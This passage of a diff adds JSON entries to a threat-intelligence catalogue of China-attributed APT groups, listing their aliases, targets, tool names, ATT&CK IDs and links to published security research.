"https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt", + "http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/icefog.pdf", + "http://www.darkreading.com/attacks-and-breaches/java-icefog-malware-variant-infects-us-businesses/d/d-id/1113451", + "https://www.anomali.com/blog/analyzing-digital-quartermasters-in-asia-do-chinese-and-indian-apts-have-a-shared-supply-chain", + "https://securelist.com/blog/incidents/58209/the-icefog-apt-hits-us-targets-with-java-backdoor/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Beijing Group", + "Sneaky Panda", + "Hydraq, SIG22, Elderwood, Elderwood Gang" + ], + "targets": [ + "This threat actor targets private sector companies in the defense, shipping, aeronautics, arms, and energy sectors, as well as nonprofits and financial firms." 
+ ], + "operations": [], + "description": null, + "tools": [ + "Hydraq", + "Elderwood Project" + ], + "links": [ + "http://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "https://blog.crysys.hu/2018/03/territorial-dispute-nsas-perspective-on-apt-landscape/", + "https://en.wikipedia.org/wiki/Operation_Aurora#Attackers_involved" + ], + "attck_id": "G0066", + "comment": "Possibly assisted in Operation Aurora, the RSA incident, and the Joint Strike Fighter Program compromise" + }, + { + "country": "china", + "names": [ + "Barista", + "BRONZE OLIVE", + "Wet Panda", + "APT22" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "FLATNOTE", + "SOGU", + "ANGRYBELL", + "SEAWOLF", + "LOGJAM", + "BASELESS", + "China Chopper", + "PISCES" + ], + "links": [ + "http://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild" + ], + "attck_id": null, + "comment": "Possible overlap with Beijing Group" + }, + { + "country": "china", + "names": [ + "Suckfly" + ], + "targets": [ + "Indian organisations and Republic of Korea" + ], + "operations": [], + "description": null, + "tools": [ + "Korplug", + "PlugX", + "Nidiran" + ], + "links": [ + "http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates" + ], + "attck_id": "G0039", + "comment": null + }, + { + "country": "china", + "names": [ + "PLA Navy", + "Wisp Team", + "Samurai Panda", + "Sykipot", + "APT4" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://www.crowdstrike.com/blog/whois-samurai-panda/" + ], + "attck_id": null, + "comment": "\u00e2\u0080\u009cPdPD\u00e2\u0080\u009d (50 64 50 44) marker for encrypted binaries" + }, + { + "country": "china", + "names": [ + "Pitty Panda", + "Pitty Tiger" + ], + 
"targets": [], + "operations": [], + "description": null, + "tools": [ + "PittyTiger", + "Paladin RAT" + ], + "links": [ + "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html", + "http://blog.malwaretracker.com/2013/06/tomato-garden-campaign-possible.html", + "http://blog.airbuscybersecurity.com/post/2014/07/The-Eye-of-the-Tiger2" + ], + "attck_id": null, + "comment": "\"Pitty Tiger\" was originally the name of a malware payload by the malware tracker blog. Airbus and FireEye identified the actor as Chinese. CrowdStrike uses \"tiger\" when naming adversaries alligned with India. Crowdstrike associates the actor with the name \"Pitty Panda\" conforming to their naming convention for Chinese actors." + }, + { + "country": "china", + "names": [ + "Scarlet Mimic" + ], + "targets": [ + "Uyghur and Tibetan activists as well as those who are interested in their causes" + ], + "operations": [], + "description": null, + "tools": [ + "FakeM", + "Psylo", + "MobileOrder" + ], + "links": [ + "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/" + ], + "attck_id": "G0029", + "comment": null + }, + { + "country": "china", + "names": [ + "Sunshop Group", + "C0d0so", + "Codoso", + "APT19" + ], + "targets": [ + "Forbes, Defense, Finance, Energy, Government, Political Dissidents, Global Think Tanks" + ], + "operations": [], + "description": "Watering Hole", + "tools": [ + "Derusbi", + "Bergard Trojan", + "TXER" + ], + "links": [ + "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks", + "https://www.proofpoint.com/us/threat-insight/post/exploring-bergard-old-malware-new-tricks", + "http://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", + "http://www.isightpartners.com/2015/02/codoso/#sthash.VJMDVPQB.dpuf", + "https://cybergeeks.tech/analyzing-apt19-malware-using-a-step-by-step-method/" + ], + "attck_id": "G0073", + "comment": null + }, + { + 
"country": "china", + "names": [ + "SVCMONDR" + ], + "targets": [ + "Taiwan, Thailand" + ], + "operations": [], + "description": null, + "tools": [ + "CVE-2015-2545" + ], + "links": [ + "https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/" + ], + "attck_id": null, + "comment": "\u00e2\u0080\u009cPdPD\u00e2\u0080\u009d (50 64 50 44) marker for encrypted binaries" + }, + { + "country": "china", + "names": [ + "Wisp Team", + "APT4" + ], + "targets": [ + "Defense Industrial Base, US Government" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.isightpartners.com/2014/09/weeks-threatscape-media-highlights-update-22/", + "https://www.isightpartners.com/2015/01/threatscape-media-highlights-update-week-january-12/", + "https://www.isightpartners.com/2014/04/weeks-threatscape-media-highlights-update-2/" + ], + "attck_id": null, + "comment": "iSight has mentioned tracking a China-nexus group they dub \"Wisp Team\" - have not resolved this w/ other naming conventions" + }, + { + "country": "china", + "names": [ + "Mana Team" + ], + "targets": [ + "Australia" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.isightpartners.com/2016/02/threatscape-media-highlights-update-week-of-february-17th/" + ], + "attck_id": null, + "comment": "iSight has mentioned tracking a China-nexus activity they dub \"Mana Team\", targeting Australian interests - have not resolved this w/ other naming conventions" + }, + { + "country": "china", + "names": [ + "TEMP.Zhenbao" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.isightpartners.com/2014/11/threatscape-media-highlights-update-week-november-10/", + "http://www.securityweek.com/plugx-rat-used-gather-intel-afghan-russian-military-report" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "SPIVY" + ], + "targets": [ + "Hong Kong 
dissidents" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Mofang", + "Whitefly", + "BRONZE WALKER" + ], + "targets": [ + "Government, military, Critical Infrastructure,Automotive Industry*,Weapon Industry*, This threat actor compromises government and critical infrastructure entities, primarily in Myanmar, for espionage purposes. Myanmar, Canada, United States, Germany, India, South Korea, Singapore" + ], + "operations": [], + "description": null, + "tools": [ + "ShimRATReporter", + "ShimRAT" + ], + "links": [ + "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore", + "https://blog.fox-it.com/2016/06/15/mofang-a-politically-motivated-information-stealing-adversary/", + "https://www.threatconnect.com/china-superman-apt/" + ], + "attck_id": "SingHealth", + "comment": null + }, + { + "country": "china", + "names": [ + "Dragon Castling", + "DragonOK" + ], + "targets": [ + "Japan, SE Asia casino & gaming" + ], + "operations": [], + "description": null, + "tools": [ + "IsSpace", + "CVE-2015-1641", + "Rambo Backdoor", + "Sysget" + ], + "links": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf", + "http://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor", + "https://decoded.avast.io/luigicamastra/operation-dragon-castling-apt-group-targeting-betting-companies/", + "https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/", + 
"http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/" + ], + "attck_id": "G0017", + "comment": null + }, + { + "country": "china", + "names": [ + "Group 27" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "3102 variant of 9002 RAT", + "EvilGrab", + "Trochilus RAT", + "PlugX" + ], + "links": [ + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Pointed-Dagger.pdf", + "https://unit42.paloaltonetworks.com/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "CactusPete", + "Tonto Team" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "RoyalRoad RTF Weaponizer" + ], + "links": [ + "https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.wsj.com/articles/chinas-secret-weapon-in-south-korea-missile-fight-hackers-1492766403?emailToken=JRrydPtyYnqTg9EyZsw31FwuZ7JNEOKCXF7LaW/HM1DLsjnUp6e6wLgph560pnmiTAN/5ssf7moyADPQj2p2Gc+YkL1yi0zhIiUM9M6aj1HTYQ==", + "https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector", + "https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "TA459" + ], + "targets": [ + "Central Asian countries, Russia, Belarus, Mongolia, and others" + ], + "operations": [], + "description": null, + "tools": [ + "PCrat", + "RoyalRoad RTF Weaponizer", + "PlugX", + "ZeroT", + "Gh0st", + "NetTraveler" + ], + "links": [ + "https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts#.WS3IBVFV4no.twitter" + ], + "attck_id": "G0062", + "comment": null + }, + { + "country": 
"china", + "names": [ + "BRONZE BUTLER", + "REDBALDKNIGHT", + "Tick" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Mimikatz", + "avirra Downloader", + "PsExec", + "Daserf", + "Datper", + "procdump", + "RoyalRoad RTF Weaponizer", + "WCE", + "ABK Downloader", + "whoami", + "Gofarer", + "gsecdump", + "VBS" + ], + "links": [ + "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan", + "https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/", + "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html", + "https://therecord.media/japanese-police-say-tick-apt-is-linked-to-chinese-military/", + "https://www.secureworks.jp/resources/rp-bronze-butler", + "https://blog.talosintelligence.com/2018/10/tracking-tick-through-recent-campaigns.html", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/" + ], + "attck_id": "G0060", + "comment": null + }, + { + "country": "china", + "names": [ + "Lucky Cat", + "Shadow Network, SabPub, TA413 (Proofpoint)" + ], + "targets": [ + "A threat actor targets computer networks associated with Tibetan activists, as well as military research and development, aerospace, engineering, and shipping industries in India and Japan." 
+ ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://blog.trendmicro.com/trendlabs-security-intelligence/luckycat-redux-inside-an-apt-campaign/", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the_luckycat_hackers.pdf", + "http://www.securityweek.com/mac-malware-linked-luckycat-attack-campaign", + "https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html", + "http://www.infoworld.com/article/2617225/malware/sabpub-malware-proves-macs-are-an-apt-target.html", + "https://securelist.com/blog/incidents/33208/new-version-of-osx-sabpub-confirmed-mac-apt-attacks-19/", + "https://www.proofpoint.com/us/blog/threat-insight/chinese-apt-ta413-resumes-targeting-tibet-following-covid-19-themed-economic", + "http://www.nartv.org/mirror/shadows-in-the-cloud.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Leviathan", + "Temp.Jumper, GADOLINIUM, MUDCARP, Hainan Xiandun Technology Company", + "Temp.Periscope", + "APT40" + ], + "targets": [ + "maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities" + ], + "operations": [], + "description": null, + "tools": [ + "MURKYTOP", + "BADFLICK", + "LUNCHMONEY", + "Derusbi", + "CVE-2017-11882", + "AIRBREAK", + "RoyalRoad RTF Weaponizer", + "BLACKCOFFEE", + "China Chopper", + "PHOTO", + "HOMEFRY", + "Beacon" + ], + "links": [ + "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", + "https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/", + "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + 
"https://intrusiontruth.wordpress.com/2020/01/10/who-is-mr-gu/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf", + "https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/", + "https://lab52.io/blog/leviathan-geostrategy-and-ttp-technical-tactics-and-procedures/", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://intrusiontruth.wordpress.com/2020/01/13/who-else-works-for-this-cover-company-network/", + "https://www.anomali.com/blog/analyzing-digital-quartermasters-in-asia-do-chinese-and-indian-apts-have-a-shared-supply-chain", + "https://intrusiontruth.wordpress.com/2020/01/14/who-is-mr-ding/", + "https://intrusiontruth.wordpress.com/2020/01/15/hainan-xiandun-technology-company-is-apt40/", + "https://intrusiontruth.wordpress.com/2020/01/09/what-is-the-hainan-xiandun-technology-development-company/" + ], + "attck_id": "G0065", + "comment": null + }, + { + "country": "china", + "names": [ + "TG-3279", + "Winnti Umbrella, China Cracking Group, ", + "PassCV" + ], + "targets": [ + "Gaming Companies" + ], + "operations": [], + "description": null, + "tools": [ + "NetCommander", + "Sabre", + "Kitkiot", + "icmp_shell", + "Etso", + "Runxx", + "rdp_crk", + "s (custom port scanner)", + "Carberp RAT", + "Conpee", + "Jynxkit", + "dnsenum", + "Gh0st RAT" + ], + "links": [ + "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies", + "https://401trg.com/burning-umbrella/", + "https://www.secureworks.com/research/threat-group-3279-targets-the-video-game-industry#up2" + ], + "attck_id": null, + "comment": "Personas: Laurentiu Moon, Sincoder" + }, + { + "country": "china", + "names": [ + "BARIUM", + "Winnti Umbrella, BRONZE ATLAS", + "TG-2633" + ], + "targets": [ + "Electronic gaming, multimedia, Internet content industries, technology companies" + ], + "operations": [], + "description": null, + 
"tools": [ + "Winnti Rootkit malware" + ], + "links": [ + "https://cloudblogs.microsoft.com/microsoftsecure/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/?source=mmpc", + "https://401trg.pw/burning-umbrella/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "LEAD", + "Winnti Umbrella" + ], + "targets": [ + "Multinational, multi-industry companies, textiles, chemicals, electronics, pharmaceutical companies, manufacturing" + ], + "operations": [], + "description": null, + "tools": [ + "Winnti Rootkit malware" + ], + "links": [ + "https://cloudblogs.microsoft.com/microsoftsecure/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/?source=mmpc", + "https://www.france24.com/en/20190404-bayer-victim-cyber-attack-german-media", + "https://401trg.pw/burning-umbrella/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Rocke", + "Iron Group" + ], + "targets": [ + "Cybercrime, Cryptomining, Cryptojacking" + ], + "operations": [], + "description": null, + "tools": [ + "XBash" + ], + "links": [ + "https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/", + "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/", + "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html", + "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang#When:18:10:00Z", + "https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Anchor Panda" + ], + "targets": [ + "This threat actor targets government and private sector entities interested in maritime issues in the South China Sea for espionage purposes. 
Maritime satellite systems, aerospace companies, and defense contractors." + ], + "operations": [], + "description": null, + "tools": [ + "Torn RAT", + "Poison Ivy", + "Adobe Gh0st" + ], + "links": [ + "http://www.crowdstrike.com/blog/whois-anchor-panda/" + ], + "attck_id": null, + "comment": "\u00e2\u0080\u009cPdPD\u00e2\u0080\u009d (50 64 50 44) marker for encrypted binaries" + }, + { + "country": "china", + "names": [ + "Aquatic Panda" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Big Panda" + ], + "targets": [ + "Financial services firms" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://www.darkreading.com/attacks-and-breaches/crowdstrike-falcon-traces-attacks-back-to-hackers/d/d-id/1110402?" + ], + "attck_id": null, + "comment": "Mentioned by Alperovitch in 2013 article as targeting financial services industry" + }, + { + "country": "china", + "names": [ + "Electric Panda" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem" + ], + "attck_id": null, + "comment": "Listed on slide 8" + }, + { + "country": "china", + "names": [ + "Eloquent Panda" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://files.sans.org/summit/Threat_Hunting_Incident_Response_Summit_2016/PDFs/Detecting-and-Responding-to-Pandas-and-Bears-Christopher-Scott-CrowdStrike-and-Wendi-Whitmore-IBM.pdf" + ], + "attck_id": null, + "comment": "Mentioned slide 15" + }, + { + "country": "china", + "names": [ + "TG-3390", + "Emissary Panda", + "BRONZE UNION", + "TEMP.Hippo", + "LuckyMouse", + "APT27", + "ZipToken, Iron Tiger" + ], + 
"targets": [ + "US Gov and contractors, Western think tanks" + ], + "operations": [ + "A Tale of Two Targets\t" + ], + "description": null, + "tools": [ + "Hunter", + "nbtscan", + "China Chopper Webshell", + "htran", + "PlugX", + "HttpBrowser", + "wce", + "ASPXTool", + "gsecdump" + ], + "links": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox", + "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", + "https://securelist.com/luckymouse-hits-national-data-center/86083/", + "https://blog.group-ib.com/task", + "https://lab52.io/blog/apt27-rootkit-updates/", + "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html", + "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", + "https://www.secureworks.com/research/bronze-union", + "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/", + "https://marcoramilli.com/2020/03/19/is-apt27-abusing-covid-19-to-attack-people/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", + "http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/", + "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia", + "https://securelist.com/luckymouse-ndisproxy-driver/87914/", + "http://newsroom.trendmicro.com/blog/operation-iron-tiger-attackers-shift-east-asia-united-states" + ], + "attck_id": "G0027", + "comment": null + }, + { + "country": "china", + "names": [ + "Foxy Panda" + ], + "targets": [ + "Technology & Communications" + ], + "operations": [], + "description": 
null, + "tools": [], + "links": [ + "http://files.sans.org/summit/Threat_Hunting_Incident_Response_Summit_2016/PDFs/Detecting-and-Responding-to-Pandas-and-Bears-Christopher-Scott-CrowdStrike-and-Wendi-Whitmore-IBM.pdf" + ], + "attck_id": null, + "comment": "Listed slide 4" + }, + { + "country": "china", + "names": [ + "Gibberish Panda" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem" + ], + "attck_id": null, + "comment": "Listed slide 8" + }, + { + "country": "china", + "names": [ + "Cycldek", + "Cycldek, Conimes Team, China1937CN Team, Temp.Conimes", + "Goblin Panda", + "Hellsing" + ], + "targets": [ + "Southeast Asia, Government of Vietnam" + ], + "operations": [], + "description": null, + "tools": [ + "Sisfader", + "BlueCore", + "ZeGhost", + "PlugX", + "RoyalRoad RTF Weaponizer", + "NewCore RAT", + "tempfun", + "RedCore" + ], + "links": [ + "https://www.fortinet.com/blog/threat-research/cta-security-playbook--goblin-panda.html", + "http://www.crowdstrike.com/blog/rhetoric-foreshadows-cyber-activity-in-the-south-china-sea/", + "https://securelist.com/cycldek-bridging-the-air-gap/97157/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf", + "https://www.anomali.com/blog/analyzing-digital-quartermasters-in-asia-do-chinese-and-indian-apts-have-a-shared-supply-chain", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/", + "https://securelist.com/the-leap-of-a-cycldek-related-threat-actor/101243/" + ], + "attck_id": null, + "comment": "Weaponizer leaked, new activity wrongly attributed to this long inactive group, possible links to Icefog/Dagger Panda and Temp.Periscope/APT40" + }, + { + "country": "china", + "names": [ + "Hammer Panda" + ], + "targets": [ + "Russia" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + 
"http://www.darkreading.com/endpoint/chinese-cyberspies-pivot-to-russia-in-wake-of-obama-xi-pact/d/d-id/1324242" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Zirconium", + "BRONZE VINEWOOD", + "Hurricane Panda", + "Black Vine", + "APT31", + "TEMP.Avengers" + ], + "targets": [ + "Aerospace, Healthcare, Energy (gas & electric turbine manufacturing), Military and defense, Finance, Agriculture, Technology, Japan, United States, United Kingdom, India, Canada, Brazil, South Africa, Australia, Thailand, South Korea, France, Switzerland, Sweden, Finland, Norway" + ], + "operations": [ + "Op. Poisoned Hurricane" + ], + "description": null, + "tools": [ + "Mimikatz", + "China Chopper Webshell", + "PlugX", + "Sakula" + ], + "links": [ + "https://raw.githubusercontent.com/GuardaCyber/APT-Groups-and-Operations/master/Reports/FireEye%20Intel%20-%20APT31%20Threat%20Group%20Profile.pdf", + "https://www.sekoia.io/en/walking-on-apt31-infrastructure-footprints/", + "https://blog.confiant.com/uncovering-2017s-largest-malvertising-operation-b84cd38d6b85", + "https://uk.reuters.com/article/uk-china-cyber-norway-visma/china-hacked-norways-visma-to-steal-client-secrets-investigators-idUKKCN1PV14R", + "http://blog.airbuscybersecurity.com/post/2015/10/Malware-Sakula-Evolutions-%28Part-2/2%29", + "https://www.symantec.com/connect/blogs/black-vine-formidable-cyberespionage-group-targeted-aerospace-healthcare-2012", + "http://blog.airbuscybersecurity.com/post/2015/09/APT-BlackVine-Malware-Sakula", + "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2021-IOC-003/", + "https://research.checkpoint.com/2021/the-story-of-jian/", + "https://therecord.media/norway-says-chinese-group-apt31-is-behind-catastrophic-2018-government-hack/", + "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains", + "http://www.crowdstrike.com/blog/cyber-deterrence-in-action-a-story-of-one-long-hurricane-panda-campaign/", + 
"http://blog.crowdstrike.com/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/" + ], + "attck_id": null, + "comment": "used free DNS servers provided by Hurricane Electric" + }, + { + "country": "china", + "names": [ + "Impersonating Panda" + ], + "targets": [ + "Financial sector" + ], + "operations": [], + "description": null, + "tools": [], + "links": [], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Judgement Panda" + ], + "targets": [ + "Upstream providers (e.g., law firms and managed service providers) to support additional intrusions against high-profile assets" + ], + "operations": [], + "description": null, + "tools": [ + "Spear-phishing", + "URL \u00e2\u0080\u009cweb bugs\u00e2\u0080\u009d and scheduled tasks to automate credential harvesting" + ], + "links": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "CactusPete", + "Bisonal (malware), Lone Ranger", + "Karma Panda", + "Tonto Team" + ], + "targets": [ + "Dissident groups" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://files.sans.org/summit/Threat_Hunting_Incident_Response_Summit_2016/PDFs/Detecting-and-Responding-to-Pandas-and-Bears-Christopher-Scott-CrowdStrike-and-Wendi-Whitmore-IBM.pdf", + "https://securelist.com/apt-trends-report-q1-2019/90643/" + ], + "attck_id": null, + "comment": "Listed slide 4" + }, + { + "country": "china", + "names": [ + "temp.bottle", + "Keyhole Panda", + "Bronze Fleetwood " + ], + "targets": [ + "Electronics & Communications" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://files.sans.org/summit/Threat_Hunting_Incident_Response_Summit_2016/PDFs/Detecting-and-Responding-to-Pandas-and-Bears-Christopher-Scott-CrowdStrike-and-Wendi-Whitmore-IBM.pdf" + ], + "attck_id": null, + 
"comment": "Listed slide 4" + }, + { + "country": "china", + "names": [ + "Kryptonite Panda" + ], + "targets": [ + "Cambodia" + ], + "operations": [], + "description": null, + "tools": [ + "8.t exploit document builder" + ], + "links": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Mustang Panda", + "Temp.Hex", + "HoneyMyte", + "BRONZE PRESIDENT", + "TA416, RedDelta" + ], + "targets": [ + "Mining sector in Mongolia, private individuals |=| gathering geo-political and economic intelligence, NGOs, political & law enforcement org in South and East Asia" + ], + "operations": [], + "description": null, + "tools": [ + "ORat", + "Nmap", + "RCSession", + "Wmiexec", + "Nbtscan", + "PlugX", + "China Chopper web shell", + "Cobalt Strike" + ], + "links": [ + "https://www.secureworks.com/research/bronze-president-targets-ngos", + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z", + "https://kc.mcafee.com/corporate/index?page=content&id=KB92635&locale=en_US", + "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html", + "https://www.secureworks.com/blog/bronze-president-targets-russian-speakers-with-updated-plugx", + "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", + "https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader", + "https://securelist.com/apt-trends-report-q3-2019/94530/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-dianxun-cyberespionage-campaign-targeting-telecommunication-companies/", + "https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european", + 
"https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", + "https://lab52.io/blog/mustang-panda-recent-activity-dll-sideloading-trojans-with-temporal-c2-servers/", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-dianxun.pdf", + "https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf " + ], + "attck_id": "G0129", + "comment": null + }, + { + "country": "china", + "names": [ + "Night Dragon" + ], + "targets": [ + "A threat actor compromised U.S. oil companies through spear phishing and remote administration tools. Oil, Energy and Petrochemical (OpNightDragon)" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://www.mcafee.com/us/resources/white-papers/wp-global-energy-cyberattacks-night-dragon.pdf", + "https://kc.mcafee.com/corporate/index?page=content&id=KB71150" + ], + "attck_id": "G0014", + "comment": null + }, + { + "country": "china", + "names": [ + "Nightshade Panda", + "APT9", + "FlowerLady" + ], + "targets": [ + "HK, US, SG, MY, JP, IN, KR, TH, TW - Aerospace, Agriculture, Construction, Energy, Healthcare, ,High Tech, Media, Transportation" + ], + "operations": [], + "description": null, + "tools": [ + "SOGU", + "VICEROY", + "GH0ST", + "XDOOR", + "SKINNYGENE", + "WETHEAD", + "PlugX", + "BIGJOLT", + "FUNRUN", + "VIPSH ELL", + "JIM A", + "HOMEUNIX", + "POISON IVY", + "PHOTO", + "ZXSHELL", + "Poison Ivy" + ], + "links": [ + "https://otx.alienvault.com/pulse/55bbc68e67db8c2d547ae393/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Nomad Panda" + ], + "targets": [ + "Central Asian nations" + ], + "operations": [], + "description": null, + "tools": 